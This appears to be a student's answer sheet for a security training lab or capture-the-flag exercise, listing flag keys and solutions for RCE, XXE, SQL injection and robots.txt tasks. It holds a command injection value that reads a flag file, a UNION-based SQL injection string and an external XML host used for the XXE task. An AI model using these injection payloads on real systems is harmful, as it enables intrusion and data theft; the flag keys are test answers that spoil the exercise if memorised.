# rk_1: Куклина Нина АПО(31)

### RCE 1

new: `X35KSR5SE307W7YYBO17CJ68GKARCD9D`

ans: `;cat /home/ubuntu/rce/flag.txt;`

### XXE 1

new: `021IV7K5TCHSIYE6PU3LPGF9CW3ZLW3`

url: Node static Host on Heroku: http://tp-host-xml.herokuapp.com/xxe

### SQLinj

new: `P4KBMQZUZ77YLIF1MNC4JGXOCSA1SGAK`

ans: `id=0 UNION SELECT * FROM flag`

### robots.txt

new: `HGLQHWEZ3WQ34SNO73Z0MLJZJX99PPUH`

ans: http://trytohack.ru/test/robots.txt

###### также были старые ключи
